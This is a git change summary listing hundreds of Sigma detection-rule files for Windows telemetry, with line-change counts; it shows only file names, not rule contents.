.../registry_set_bginfo_custom_db.yml | 6 +- .../registry_set_bginfo_custom_vbscript.yml | 9 +- .../registry_set_bginfo_custom_wmi_query.yml | 9 +- .../registry_set_blackbyte_ransomware.yml | 3 +- ...istry_set_bypass_uac_using_eventviewer.yml | 3 +- ...et_bypass_uac_using_silentcleanup_task.yml | 4 +- 
.../registry_set_change_rdp_port.yml | 13 +- .../registry_set_change_security_zones.yml | 8 +- ...stry_set_change_sysmon_driver_altitude.yml | 4 +- ...gistry_set_change_winevt_channelaccess.yml | 9 +- .../registry_set_clickonce_trust_prompt.yml | 3 +- ...stry_set_cobaltstrike_service_installs.yml | 12 +- ...istry_set_creation_service_susp_folder.yml | 16 +- ...y_set_creation_service_uncommon_folder.yml | 22 +- ...try_set_cve_2020_1048_new_printer_port.yml | 3 +- ...gistry_set_cve_2022_30190_msdt_follina.yml | 3 +- ...try_set_dbgmanageddebugger_persistence.yml | 10 +- .../registry_set_defender_exclusions.yml | 4 +- ...registry_set_desktop_background_change.yml | 21 +- ...pervisorenforcedcodeintegrity_disabled.yml | 7 +- .../registry_set_dhcp_calloutdll.yml | 4 +- ...istry_set_disable_administrative_share.yml | 4 +- ...gistry_set_disable_autologger_sessions.yml | 3 +- ...registry_set_disable_defender_firewall.yml | 6 +- .../registry_set_disable_function_user.yml | 3 +- ...stry_set_disable_macroruntimescanscope.yml | 3 +- ..._disable_security_center_notifications.yml | 3 +- .../registry_set_disable_system_restore.yml | 3 +- .../registry_set_disable_uac_registry.yml | 4 +- ...y_set_disable_windows_defender_service.yml | 5 +- .../registry_set_disable_winevt_logging.yml | 15 +- ...it_guard_net_protection_on_ms_defender.yml | 3 +- ...t_disabled_microsoft_defender_eventlog.yml | 9 +- ...amper_protection_on_microsoft_defender.yml | 4 +- .../registry_set_disallowrun_execution.yml | 3 +- ...sk_cleanup_handler_autorun_persistence.yml | 19 +- .../registry_set_dns_over_https_enabled.yml | 13 +- ...gistry_set_dns_server_level_plugin_dll.yml | 12 +- .../registry_set_dot_net_etw_tamper.yml | 6 +- ...et_enabling_cor_profiler_env_variables.yml | 3 +- .../registry_set_enabling_turnoffcheck.yml | 3 +- .../registry_set_evtx_file_key_tamper.yml | 4 +- ...ry_set_exploit_guard_susp_allowed_apps.yml | 6 +- .../registry_set_fax_change_service_user.yml | 3 +- 
.../registry_set_file_association_exefile.yml | 3 +- ...egistry_set_hangs_debugger_persistence.yml | 3 +- .../registry_set_hhctrl_persistence.yml | 3 +- .../registry_set/registry_set_hide_file.yml | 3 +- .../registry_set_hide_function_user.yml | 3 +- ...t_hide_scheduled_task_via_index_tamper.yml | 18 +- ...urity_zone_protocol_defaults_downgrade.yml | 12 +- ...registry_set_ime_non_default_extension.yml | 23 +- .../registry_set_ime_suspicious_paths.yml | 38 +- ...stry_set_install_root_or_ca_certificat.yml | 3 +- ...t_explorer_disable_first_run_customize.yml | 14 +- .../registry_set_legalnotice_susp_message.yml | 4 +- ...y_set_lolbin_onedrivestandaloneupdater.yml | 10 +- ...egistry_set_lsa_disablerestrictedadmin.yml | 18 +- .../registry_set_lsass_usermode_dumping.yml | 4 +- .../registry_set/registry_set_mal_adwind.yml | 4 +- .../registry_set_mal_blue_mockingbird.yml | 4 +- ...istry_set_net_cli_ngenassemblyusagelog.yml | 15 +- ...tsh_help_dll_persistence_susp_location.yml | 39 +- ...netsh_helper_dll_potential_persistence.yml | 15 +- ...registry_set_new_application_appcompat.yml | 6 +- .../registry_set_new_network_provider.yml | 7 +- .../registry_set_odbc_driver_registered.yml | 3 +- ...gistry_set_odbc_driver_registered_susp.yml | 3 +- ...registry_set_office_access_vbom_tamper.yml | 8 +- ...office_disable_protected_view_features.yml | 7 +- .../registry_set_office_enable_dde.yml | 3 +- ...ook_enable_load_macro_provider_on_boot.yml | 3 +- ..._office_outlook_enable_macro_execution.yml | 3 +- ...utlook_enable_unsafe_client_mail_rules.yml | 11 +- ...y_set_office_outlook_security_settings.yml | 4 +- ..._set_office_trust_record_susp_location.yml | 7 +- ...y_set_office_trusted_location_uncommon.yml | 14 +- ...egistry_set_office_vba_warnings_tamper.yml | 7 +- ...ce_app_cpmpat_layer_registerapprestart.yml | 11 +- .../registry_set_persistence_app_paths.yml | 19 +- .../registry_set_persistence_autodial_dll.yml | 3 +- .../registry_set_persistence_chm.yml | 3 +- 
...rsistence_com_hijacking_susp_locations.yml | 13 +- ..._persistence_comhijack_psfactorybuffer.yml | 3 +- ...et_persistence_custom_protocol_handler.yml | 13 +- ...et_persistence_event_viewer_events_asp.yml | 5 +- .../registry_set_persistence_globalflags.yml | 7 +- .../registry_set_persistence_ie.yml | 6 +- .../registry_set_persistence_ifilter.yml | 7 +- ...registry_set_persistence_lsa_extension.yml | 10 +- .../registry_set_persistence_mpnotify.yml | 6 +- .../registry_set_persistence_mycomputer.yml | 7 +- ...istry_set_persistence_natural_language.yml | 8 +- .../registry_set_persistence_office_vsto.yml | 6 +- ...stry_set_persistence_outlook_todaypage.yml | 7 +- ...gistry_set_persistence_reflectdebugger.yml | 9 +- .../registry_set_persistence_scrobj_dll.yml | 3 +- .../registry_set_persistence_search_order.yml | 7 +- ...registry_set_persistence_shim_database.yml | 11 +- ...istence_shim_database_susp_application.yml | 3 +- ...stence_shim_database_uncommon_location.yml | 3 +- .../registry_set_persistence_typed_paths.yml | 4 +- .../registry_set_persistence_xll.yml | 3 +- ...istry_set_policies_associations_tamper.yml | 5 +- ...gistry_set_policies_attachments_tamper.yml | 3 +- ...y_set_powershell_enablescripts_enabled.yml | 7 +- ...gistry_set_powershell_execution_policy.yml | 16 +- ...gistry_set_powershell_logging_disabled.yml | 4 +- ...egistry_set_provisioning_command_abuse.yml | 18 +- ...set_renamed_sysinternals_eula_accepted.yml | 16 +- .../registry_set_rpcrt4_etw_tamper.yml | 8 +- ...stry_set_scr_file_executed_by_rundll32.yml | 3 +- .../registry_set_servicedll_hijack.yml | 3 +- .../registry_set_services_etw_tamper.yml | 3 +- .../registry_set_set_nopolicies_user.yml | 3 +- .../registry_set_sip_persistence.yml | 4 +- .../registry_set_sophos_av_tamper.yml | 3 +- .../registry_set_special_accounts.yml | 10 +- ...ry_set_suppress_defender_notifications.yml | 3 +- ...registry_set_susp_keyboard_layout_load.yml | 16 +- ...y_set_susp_pendingfilerenameoperations.yml | 6 +- 
.../registry_set_susp_printer_driver.yml | 6 +- ...stry_set_susp_reg_persist_explorer_run.yml | 3 +- .../registry_set_susp_run_key_img_folder.yml | 31 +- .../registry_set_susp_service_installed.yml | 15 +- .../registry_set_susp_user_shell_folders.yml | 6 +- .../registry_set_suspicious_env_variables.yml | 73 +- .../registry_set_system_lsa_nolmhash.yml | 14 +- .../registry_set_taskcache_entry.yml | 9 +- .../registry_set_telemetry_persistence.yml | 25 +- ...egistry_set_terminal_server_suspicious.yml | 29 +- ...registry_set_terminal_server_tampering.yml | 49 +- .../registry_set_timeproviders_dllname.yml | 10 +- ...y_set_tls_protocol_old_version_enabled.yml | 3 +- .../registry_set_treatas_persistence.yml | 4 + .../registry_set_turn_on_dev_features.yml | 8 +- .../registry_set_uac_bypass_sdclt.yml | 3 +- .../registry_set_uac_bypass_winsat.yml | 3 +- .../registry_set_uac_bypass_wmp.yml | 6 +- .../registry_set_vbs_payload_stored.yml | 3 +- .../registry_set_wab_dllpath_reg_change.yml | 3 +- ..._set_wdigest_enable_uselogoncredential.yml | 4 +- .../registry_set_windows_defender_tamper.yml | 14 +- ...ry_set_winget_admin_settings_tampering.yml | 6 +- ...istry_set_winget_enable_local_manifest.yml | 7 +- ...set_winlogon_allow_multiple_tssessions.yml | 10 +- .../registry_set_winlogon_notify_key.yml | 10 +- .../win_security_access_token_abuse.yml | 6 +- .../win_security_admin_rdp_login.yml | 4 +- ...er_added_security_enabled_global_group.yml | 11 +- ..._removed_security_enabled_global_group.yml | 11 +- .../win_security_overpass_the_hash.yml | 3 +- .../win_security_pass_the_hash_2.yml | 6 +- .../win_security_rdp_bluekeep_poc_scanner.yml | 3 +- ...scrcons_remote_wmi_scripteventconsumer.yml | 3 +- ..._security_enabled_global_group_deleted.yml | 8 +- ...y_successful_external_remote_rdp_login.yml | 20 +- ...y_successful_external_remote_smb_login.yml | 20 +- .../win_security_susp_failed_logon_source.yml | 21 +- .../win_security_susp_krbrelayup.yml | 3 +- 
.../win_security_susp_rottenpotato.yml | 3 +- ...in_security_wfp_endpoint_agent_blocked.yml | 148 +- ...rity_aadhealth_mon_agent_regkey_access.yml | 11 +- ...rity_aadhealth_svc_agent_regkey_access.yml | 16 +- ...ecurity_account_backdoor_dcsync_rights.yml | 19 +- .../win_security_account_discovery.yml | 25 +- ...ity_ad_replication_non_machine_account.yml | 7 +- .../win_security_ad_user_enumeration.yml | 28 +- ...e_template_configuration_vulnerability.yml | 4 +- ...mplate_configuration_vulnerability_eku.yml | 10 +- .../win_security_add_remove_computer.yml | 3 +- .../win_security_admin_share_access.yml | 3 +- ...ty_alert_active_directory_user_control.yml | 8 +- .../win_security_alert_ad_user_backdoors.yml | 15 +- ..._security_alert_enable_weak_encryption.yml | 22 +- .../security/win_security_atsvc_task.yml | 8 +- .../win_security_audit_log_cleared.yml | 14 +- ...security_cobaltstrike_service_installs.yml | 12 +- ...n_security_codeintegrity_check_failure.yml | 6 +- ...ecurity_dce_rpc_smb_spoolss_named_pipe.yml | 6 +- .../win_security_dcom_iertutil_dll_hijack.yml | 4 +- .../win_security_disable_event_auditing.yml | 61 +- ...curity_disable_event_auditing_critical.yml | 42 +- .../win_security_dot_net_etw_tamper.yml | 4 +- ...rity_dpapi_domain_backupkey_extraction.yml | 3 +- ..._dpapi_domain_masterkey_backup_attempt.yml | 6 +- .../security/win_security_external_device.yml | 3 +- .../win_security_gpo_scheduledtasks.yml | 11 +- .../win_security_hidden_user_creation.yml | 3 +- .../security/win_security_hktl_nofilter.yml | 9 +- ...y_hybridconnectionmgr_svc_installation.yml | 3 +- .../security/win_security_impacket_psexec.yml | 5 +- .../win_security_impacket_secretdump.yml | 5 +- ...oke_obfuscation_clip_services_security.yml | 10 +- ...ation_obfuscated_iex_services_security.yml | 24 +- ...ke_obfuscation_stdin_services_security.yml | 9 +- ...voke_obfuscation_var_services_security.yml | 12 +- ...scation_via_compress_services_security.yml | 9 +- 
...fuscation_via_rundll_services_security.yml | 9 +- ...bfuscation_via_stdin_services_security.yml | 9 +- ...scation_via_use_clip_services_security.yml | 9 +- ...cation_via_use_mshta_services_security.yml | 9 +- ...ion_via_use_rundll32_services_security.yml | 9 +- ..._obfuscation_via_var_services_security.yml | 12 +- .../security/win_security_iso_mount.yml | 3 +- .../security/win_security_lm_namedpipe.yml | 12 +- ...curity_lsass_access_non_system_account.yml | 17 +- .../security/win_security_mal_creddumper.yml | 13 +- .../win_security_mal_service_installs.yml | 10 +- .../security/win_security_mal_wceaux_dll.yml | 3 +- ...win_security_metasploit_authentication.yml | 2 +- ...or_impacket_smb_psexec_service_install.yml | 15 +- ...cobaltstrike_getsystem_service_install.yml | 16 +- .../win_security_net_ntlm_downgrade.yml | 5 +- ...ecurity_net_share_obj_susp_desktop_ini.yml | 4 +- ..._renamed_user_account_with_dollar_sign.yml | 4 +- .../win_security_not_allowed_rdp_access.yml | 10 +- ...in_security_password_policy_enumerated.yml | 4 +- .../security/win_security_pcap_drivers.yml | 6 +- .../win_security_petitpotam_network_share.yml | 5 +- ...n_security_petitpotam_susp_tgt_request.yml | 28 +- .../win_security_possible_dc_shadow.yml | 13 +- ...powershell_script_installed_as_service.yml | 7 +- ...urity_protected_storage_service_access.yml | 3 +- .../win_security_rdp_reverse_tunnel.yml | 8 +- ...ty_registry_permissions_weakness_check.yml | 19 +- ...win_security_remote_powershell_session.yml | 3 +- .../win_security_replay_attack_detected.yml | 3 +- ...n_security_scm_database_handle_failure.yml | 4 +- ...service_install_remote_access_software.yml | 38 +- ..._service_installation_by_unusal_client.yml | 14 +- ...ecurity_smb_file_creation_admin_shares.yml | 3 +- .../win_security_susp_add_sid_history.yml | 5 +- .../win_security_susp_computer_name.yml | 1 + ...win_security_susp_dsrm_password_change.yml | 3 +- ...win_security_susp_failed_logon_reasons.yml | 15 +- 
...in_security_susp_kerberos_manipulation.yml | 3 +- .../win_security_susp_ldap_dataexchange.yml | 13 +- ...security_susp_local_anon_logon_created.yml | 4 +- ...curity_susp_logon_explicit_credentials.yml | 3 +- .../security/win_security_susp_lsass_dump.yml | 3 +- .../win_security_susp_lsass_dump_generic.yml | 41 +- .../win_security_susp_net_recon_activity.yml | 10 +- ...win_security_susp_opened_encrypted_zip.yml | 5 +- ...ity_susp_opened_encrypted_zip_filename.yml | 4 +- ...rity_susp_opened_encrypted_zip_outlook.yml | 3 +- ...rity_susp_outbound_kerberos_connection.yml | 11 +- ...susp_possible_shadow_credentials_added.yml | 25 +- .../security/win_security_susp_psexec.yml | 9 +- ...n_security_susp_raccess_sensitive_fext.yml | 4 +- ..._security_susp_scheduled_task_creation.yml | 7 +- ..._susp_scheduled_task_delete_or_disable.yml | 26 +- ...in_security_susp_scheduled_task_update.yml | 8 +- .../win_security_susp_time_modification.yml | 10 +- .../win_security_svcctl_remote_service.yml | 8 +- .../win_security_syskey_registry_access.yml | 3 +- ...rity_sysmon_channel_reference_deletion.yml | 5 +- .../win_security_tap_driver_installation.yml | 10 +- ...security_teams_suspicious_objectaccess.yml | 3 +- ...iles_with_cred_data_via_network_shares.yml | 10 +- ...ity_user_added_to_local_administrators.yml | 3 +- ...l_priv_service_lsaregisterlogonprocess.yml | 6 +- .../security/win_security_user_creation.yml | 4 +- .../win_security_user_driver_loaded.yml | 25 +- .../security/win_security_user_logoff.yml | 3 +- ..._vssaudit_secevent_source_registration.yml | 6 +- ..._defender_exclusions_registry_modified.yml | 20 +- ...ndows_defender_exclusions_write_access.yml | 26 +- ...dows_defender_exclusions_write_deleted.yml | 19 +- .../security/win_security_wmi_persistence.yml | 7 +- ..._security_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- .../win_security_workstation_was_locked.yml | 27 +- ...mitigations_defender_load_unsigned_dll.yml | 6 +- ...ations_unsigned_dll_from_susp_location.yml | 3 +- 
...win_shell_core_susp_packages_installed.yml | 7 +- ...lient_security_susp_failed_guest_logon.yml | 3 +- .../lsasrv/win_system_lsasrv_ntlmv1.yml | 4 +- .../win_system_susp_dhcp_config.yml | 3 +- .../win_system_susp_dhcp_config_failed.yml | 3 +- .../win_system_exploit_cve_2021_42287.yml | 21 +- .../win_system_lpe_indicators_tabtip.yml | 9 +- .../win_system_eventlog_cleared.yml | 19 +- .../win_system_susp_eventlog_cleared.yml | 13 +- ...stem_kdcsvc_cert_use_no_strong_mapping.yml | 24 +- .../win_system_kdcsvc_rc4_downgrade.yml | 5 +- .../win_system_susp_sam_dump.yml | 3 +- ..._vuln_cve_2022_21919_or_cve_2021_34484.yml | 5 +- .../win_system_susp_system_update_error.yml | 13 +- ...gon_exploitation_using_wellknown_tools.yml | 4 +- .../netlogon/win_system_vul_cve_2020_1472.yml | 5 +- .../ntfs/win_system_ntfs_vuln_exploit.yml | 3 +- ...n_system_cobaltstrike_service_installs.yml | 8 +- .../win_system_defender_disabled.yml | 11 +- .../win_system_hack_smbexec.yml | 2 +- ...ystem_invoke_obfuscation_clip_services.yml | 2 +- ...ke_obfuscation_obfuscated_iex_services.yml | 17 +- ...stem_invoke_obfuscation_stdin_services.yml | 13 +- ...system_invoke_obfuscation_var_services.yml | 5 +- ...voke_obfuscation_via_compress_services.yml | 2 +- ...invoke_obfuscation_via_rundll_services.yml | 2 +- ..._invoke_obfuscation_via_stdin_services.yml | 3 +- ...voke_obfuscation_via_use_clip_services.yml | 2 +- ...oke_obfuscation_via_use_mshta_services.yml | 2 +- ..._obfuscation_via_use_rundll32_services.yml | 2 +- ...em_invoke_obfuscation_via_var_services.yml | 5 +- ...system_krbrelayup_service_installation.yml | 4 +- .../win_system_mal_creddumper.yml | 6 +- ...tstrike_getsystem_service_installation.yml | 9 +- .../win_system_moriya_rootkit.yml | 3 +- .../win_system_service_install_anydesk.yml | 3 +- .../win_system_service_install_csexecsvc.yml | 5 +- .../win_system_service_install_hacktools.yml | 2 +- .../win_system_service_install_mesh_agent.yml | 7 +- 
...tem_service_install_netsupport_manager.yml | 12 +- .../win_system_service_install_paexec.yml | 4 +- .../win_system_service_install_pdqdeploy.yml | 18 +- ...ystem_service_install_pdqdeploy_runner.yml | 14 +- ...ystem_service_install_pua_proceshacker.yml | 3 +- .../win_system_service_install_remcom.yml | 4 +- ...service_install_remote_access_software.yml | 32 +- ...ystem_service_install_remote_utilities.yml | 16 +- .../win_system_service_install_sliver.yml | 3 +- ...tem_service_install_sups_unusal_client.yml | 7 +- .../win_system_service_install_susp.yml | 12 +- ...em_service_install_sysinternals_psexec.yml | 4 +- ...win_system_service_install_tacticalrmm.yml | 7 +- .../win_system_service_install_tap_driver.yml | 3 +- .../win_system_service_install_uncommon.yml | 25 +- ...ystem_service_terminated_error_generic.yml | 9 +- ...tem_service_terminated_error_important.yml | 46 +- ...system_service_terminated_unexpectedly.yml | 18 +- ...n_system_susp_rtcore64_service_install.yml | 3 +- ...sp_service_installation_folder_pattern.yml | 4 +- ...win_system_rdp_potential_cve_2019_0708.yml | 1 + ...cheduler_execution_from_susp_locations.yml | 14 +- ...er_lolbin_execution_via_task_scheduler.yml | 19 +- ...win_taskscheduler_susp_schtasks_delete.yml | 16 +- .../win_terminalservices_rdp_ngrok.yml | 3 +- .../posh_pc_alternate_powershell_hosts.yml | 15 +- .../posh_pm_susp_netfirewallrule_recon.yml | 3 +- .../posh_ps_compress_archive_usage.yml | 11 +- .../posh_ps_mailbox_access.yml | 5 +- .../posh_ps_new_smbmapping_quic.yml | 11 +- .../posh_ps_registry_reconnaissance.yml | 13 +- .../posh_ps_remove_item_path.yml | 3 +- .../posh_ps_win_api_functions_access.yml | 16 +- .../posh_ps_win_api_library_access.yml | 20 +- .../proc_creation_win_csc_compilation.yml | 14 +- .../proc_creation_win_curl_download.yml | 19 +- .../proc_creation_win_curl_execution.yml | 11 +- .../proc_creation_win_curl_fileupload.yml | 21 +- .../proc_creation_win_curl_useragent.yml | 6 +- 
...roc_creation_win_dfsvc_child_processes.yml | 8 +- ..._creation_win_diskshadow_child_process.yml | 22 +- ...oc_creation_win_diskshadow_script_mode.yml | 29 +- ...oc_creation_win_findstr_password_recon.yml | 27 +- .../proc_creation_win_net_quic.yml | 21 +- ...roc_creation_win_office_svchost_parent.yml | 13 +- ...n_powershell_abnormal_commandline_size.yml | 21 +- ...eation_win_powershell_crypto_namespace.yml | 30 +- ..._creation_win_powershell_import_module.yml | 22 +- ...on_win_regsvr32_dllregisterserver_exec.yml | 48 +- ...reation_win_rundll32_dllregisterserver.yml | 25 +- ...c_creation_win_susp_compression_params.yml | 5 +- ...reation_win_susp_elevated_system_shell.yml | 29 +- ...proc_creation_win_susp_event_log_query.yml | 30 +- ...win_susp_file_permission_modifications.yml | 28 +- .../proc_creation_win_taskkill_execution.yml | 20 +- ...oc_creation_win_wmic_recon_system_info.yml | 28 +- .../registry_set_office_trusted_location.yml | 11 +- ...gistry_set_powershell_crypto_namespace.yml | 16 +- .../win_security_scheduled_task_deletion.yml | 13 +- ...h_ps_cl_mutexverifiers_lolscript_count.yml | 3 +- ..._correlation_apt_silence_downloader_v3.yml | 9 +- ..._correlation_apt_turla_commands_medium.yml | 6 +- ...tion_dnscat2_powershell_implementation.yml | 11 +- ...tion_win_correlation_multiple_susp_cli.yml | 5 +- ...orrelation_susp_builtin_commands_recon.yml | 44 +- ...d_cmd_and_powershell_spawned_processes.yml | 10 +- ..._party_drivers_exploits_token_stealing.yml | 7 +- .../unsupported/win_mal_service_installs.yml | 7 +- ...or_impacket_smb_psexec_service_install.yml | 8 +- .../unsupported/win_remote_schtask.yml | 7 +- ...in_security_global_catalog_enumeration.yml | 7 +- .../win_security_rare_schtasks_creations.yml | 9 +- ...usp_failed_logons_explicit_credentials.yml | 8 +- ...rity_susp_failed_logons_single_process.yml | 6 +- ...urity_susp_failed_logons_single_source.yml | 6 +- ...rity_susp_failed_logons_single_source2.yml | 10 +- 
...p_failed_logons_single_source_kerberos.yml | 6 +- ..._failed_logons_single_source_kerberos2.yml | 6 +- ..._failed_logons_single_source_kerberos3.yml | 6 +- ..._susp_failed_logons_single_source_ntlm.yml | 8 +- ...susp_failed_logons_single_source_ntlm2.yml | 8 +- ...usp_failed_remote_logons_single_source.yml | 6 +- ...susp_multiple_files_renamed_or_deleted.yml | 7 +- .../win_security_susp_samr_pwset.yml | 15 +- .../win_system_rare_service_installs.yml | 4 +- ...in_taskscheduler_rare_schtask_creation.yml | 10 +- sigma/builtin/win_alert_mimikatz_keywords.yml | 6 +- ..._defender_antimalware_platform_expired.yml | 15 +- .../win_defender_asr_lsass_access.yml | 4 +- .../windefend/win_defender_asr_psexec_wmi.yml | 6 +- ...defender_config_change_exclusion_added.yml | 2 +- ...der_config_change_exploit_guard_tamper.yml | 18 +- ...onfig_change_sample_submission_consent.yml | 17 +- .../windefend/win_defender_history_delete.yml | 2 +- ...defender_malware_and_pua_scan_disabled.yml | 11 +- ..._defender_malware_detected_amsi_source.yml | 2 +- ...defender_real_time_protection_disabled.yml | 15 +- ...n_defender_real_time_protection_errors.yml | 18 +- .../win_defender_restored_quarantine_file.yml | 2 +- ...defender_suspicious_features_tampering.yml | 18 +- ...win_defender_tamper_protection_trigger.yml | 8 +- .../builtin/windefend/win_defender_threat.yml | 10 +- .../win_defender_virus_scan_disabled.yml | 8 +- sigma/builtin/wmi/win_wmi_persistence.yml | 10 +- ...ate_remote_thread_win_hktl_cactustorch.yml | 4 +- ...te_remote_thread_win_hktl_cobaltstrike.yml | 3 +- .../create_remote_thread_win_keepass.yml | 3 +- .../create_remote_thread_win_loadlibrary.yml | 3 +- ..._remote_thread_win_mstsc_susp_location.yml | 10 +- ...emote_thread_win_password_dumper_lsass.yml | 10 +- ...ate_remote_thread_win_powershell_lsass.yml | 8 +- ...ote_thread_win_powershell_susp_targets.yml | 8 +- ...emote_thread_win_uncommon_source_image.yml | 17 +- ...emote_thread_win_uncommon_target_image.yml | 7 +- 
.../create_stream_hash_ads_executable.yml | 7 +- ...ate_stream_hash_creation_internet_file.yml | 16 +- ...haring_domains_download_susp_extension.yml | 9 +- ...ing_domains_download_unusual_extension.yml | 9 +- ...eate_stream_hash_hktl_generic_download.yml | 415 +- ...eate_stream_hash_regedit_export_to_ads.yml | 3 +- ...stream_hash_winget_susp_package_source.yml | 4 +- .../create_stream_hash_zip_tld_download.yml | 6 +- ...e_thread_win_susp_remote_thread_target.yml | 21 +- .../driver_load_win_mal_creddumper.yml | 10 +- .../driver_load_win_mal_poortry_driver.yml | 45 +- ...powershell_script_installed_as_service.yml | 4 +- ...oad_win_vuln_avast_anti_rootkit_driver.yml | 13 +- .../driver_load_win_vuln_dell_driver.yml | 21 +- .../driver_load_win_vuln_drivers_names.yml | 11 +- .../driver_load_win_vuln_gigabyte_driver.yml | 21 +- .../driver_load_win_vuln_hw_driver.yml | 27 +- .../driver_load_win_vuln_lenovo_driver.yml | 9 +- .../file_event_win_hktl_createminidump.yml | 7 +- ...nt_win_lsass_memory_dump_file_creation.yml | 6 +- ...ile_event_win_mimikatz_memssp_log_file.yml | 4 +- .../file_event_win_susp_clr_logs.yml | 9 +- ..._alternate_powershell_hosts_moduleload.yml | 24 +- .../image_load_side_load_advapi32.yml | 3 +- .../deprecated/image_load_side_load_scm.yml | 7 +- .../image_load_side_load_svchost_dlls.yml | 15 +- .../image_load_susp_winword_wmidll_load.yml | 1 + .../pipe_created_psexec_pipes_artifacts.yml | 7 +- ...ccess_win_in_memory_assembly_execution.yml | 85 +- .../proc_access_win_lsass_susp_access.yml | 37 +- ...ss_win_pypykatz_cred_dump_lsass_access.yml | 2 +- ...proc_creation_win_apt_apt29_thinktanks.yml | 5 +- .../proc_creation_win_apt_gallium.yml | 7 +- .../proc_creation_win_apt_hurricane_panda.yml | 10 +- ...reation_win_apt_lazarus_activity_apr21.yml | 9 +- .../proc_creation_win_apt_lazarus_loader.yml | 14 +- ..._creation_win_apt_muddywater_dnstunnel.yml | 2 +- .../proc_creation_win_apt_ta505_dropper.yml | 7 +- ...c_creation_win_certutil_susp_execution.yml | 
12 +- .../proc_creation_win_cmd_read_contents.yml | 20 +- ...oc_creation_win_cmd_redirect_to_stream.yml | 7 +- ...tial_acquisition_registry_hive_dumping.yml | 8 +- .../proc_creation_win_cscript_vbs.yml | 14 +- ...ion_mssql_xp_cmdshell_stored_procedure.yml | 16 +- .../proc_creation_win_indirect_cmd.yml | 6 +- ...in_indirect_command_execution_forfiles.yml | 12 +- ...tion_win_invoke_obfuscation_via_rundll.yml | 4 +- ...in_invoke_obfuscation_via_use_rundll32.yml | 4 +- ...eation_win_lolbas_execution_of_wuauclt.yml | 7 +- .../proc_creation_win_lolbin_findstr.yml | 20 +- .../proc_creation_win_lolbin_office.yml | 5 +- .../proc_creation_win_lolbin_rdrleakdiag.yml | 4 +- ...ion_win_lolbins_by_office_applications.yml | 7 +- .../deprecated/proc_creation_win_mal_ryuk.yml | 8 +- ...on_win_malware_trickbot_recon_activity.yml | 10 +- .../proc_creation_win_mavinject_proc_inj.yml | 2 +- .../proc_creation_win_msdt_diagcab.yml | 9 +- ...proc_creation_win_new_service_creation.yml | 4 +- ...tion_win_nslookup_pwsh_download_cradle.yml | 7 +- .../proc_creation_win_odbcconf_susp_exec.yml | 10 +- ..._from_proxy_executing_regsvr32_payload.yml | 23 +- ...from_proxy_executing_regsvr32_payload2.yml | 23 +- ...on_win_office_spawning_wmi_commandline.yml | 8 +- ...creation_win_possible_applocker_bypass.yml | 16 +- ...n_powershell_amsi_bypass_pattern_nov22.yml | 5 +- ..._powershell_base64_invoke_susp_cmdlets.yml | 12 +- ...n_powershell_base64_listing_shadowcopy.yml | 3 +- ...eation_win_powershell_base64_shellcode.yml | 2 +- .../proc_creation_win_powershell_bitsjob.yml | 2 +- ...on_win_powershell_service_modification.yml | 15 +- ...ion_win_powershell_xor_encoded_command.yml | 22 +- .../proc_creation_win_reg_dump_sam.yml | 12 +- .../proc_creation_win_regsvr32_anomalies.yml | 24 +- .../proc_creation_win_renamed_paexec.yml | 25 +- .../proc_creation_win_renamed_powershell.yml | 3 +- .../proc_creation_win_renamed_psexec.yml | 3 +- .../proc_creation_win_renamed_rundll32.yml | 3 +- 
...reation_win_root_certificate_installed.yml | 18 +- .../proc_creation_win_run_from_zip.yml | 3 +- ...roc_creation_win_sc_delete_av_services.yml | 25 +- .../proc_creation_win_schtasks_user_temp.yml | 4 +- .../proc_creation_win_service_stop.yml | 31 +- .../proc_creation_win_susp_bitstransfer.yml | 5 +- ...eation_win_susp_cmd_exectution_via_wmi.yml | 7 +- ...oc_creation_win_susp_commandline_chars.yml | 27 +- ...c_creation_win_susp_lolbin_non_c_drive.yml | 15 +- .../proc_creation_win_susp_run_folder.yml | 19 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 12 +- ..._sysinternals_psexec_service_execution.yml | 6 +- ...eation_win_sysinternals_psexesvc_start.yml | 2 +- .../proc_creation_win_whoami_as_system.yml | 9 +- .../proc_creation_win_winword_dll_load.yml | 2 +- ..._win_wmic_execution_via_office_process.yml | 15 +- .../proc_creation_win_wmic_remote_command.yml | 6 +- .../proc_creation_win_wmic_remote_service.yml | 24 +- .../proc_creation_win_wuauclt_execution.yml | 8 +- ..._creation_syncappvpublishingserver_exe.yml | 5 +- ...add_sysinternals_sdelete_registry_keys.yml | 5 +- ...istry_event_asep_reg_keys_modification.yml | 23 +- ...sing_windows_telemetry_for_persistence.yml | 14 +- .../registry_set_add_hidden_user.yml | 3 +- ...ble_microsoft_office_security_features.yml | 5 + .../registry_set_office_security.yml | 3 +- .../registry_set_silentprocessexit.yml | 3 +- .../sysmon_dcom_iertutil_dll_hijack.yml | 4 +- .../sysmon_mimikatz_detection_lsass.yml | 4 +- ...sysmon_powershell_execution_moduleload.yml | 2 +- .../deprecated/sysmon_rclone_execution.yml | 7 +- .../win_dsquery_domain_trust_discovery.yml | 12 +- .../deprecated/win_susp_esentutl_activity.yml | 6 +- .../deprecated/win_susp_rclone_exec.yml | 5 +- .../win_susp_vssadmin_ntds_activity.yml | 5 +- .../dns_query_win_anonymfiles_com.yml | 7 +- .../dns_query/dns_query_win_appinstaller.yml | 11 +- ...dns_query_win_devtunnels_communication.yml | 18 +- ...in_dns_server_discovery_via_ldap_query.yml | 4 +- 
...ery_win_hybridconnectionmgr_servicebus.yml | 6 +- .../dns_query_win_mal_cobaltstrike.yml | 7 +- .../dns_query/dns_query_win_mega_nz.yml | 4 +- .../dns_query_win_regsvr32_dns_query.yml | 4 +- ...e_access_software_domains_non_browsers.yml | 53 +- .../dns_query_win_susp_external_ip_lookup.yml | 13 +- ...eamviewer_domain_query_by_uncommon_app.yml | 8 +- .../dns_query_win_tor_onion_domain_query.yml | 4 +- .../dns_query_win_ufile_io_query.yml | 10 +- ..._query_win_vscode_tunnel_communication.yml | 18 +- .../driver_load_win_mal_drivers_names.yml | 7 +- .../driver_load_win_pua_process_hacker.yml | 7 +- .../driver_load_win_pua_system_informer.yml | 7 +- .../driver_load_win_susp_temp_use.yml | 3 +- .../driver_load_win_vuln_drivers_names.yml | 10 +- .../driver_load_win_vuln_hevd_driver.yml | 12 +- .../driver_load_win_vuln_winring0_driver.yml | 3 +- .../driver_load/driver_load_win_windivert.yml | 4 +- .../Axiom/proc_creation_win_apt_zxshell.yml | 2 +- ...eation_win_apt_turla_commands_critical.yml | 2 +- ...oc_creation_win_apt_turla_comrat_may20.yml | 4 +- ...roc_creation_win_exploit_cve_2015_1641.yml | 3 +- 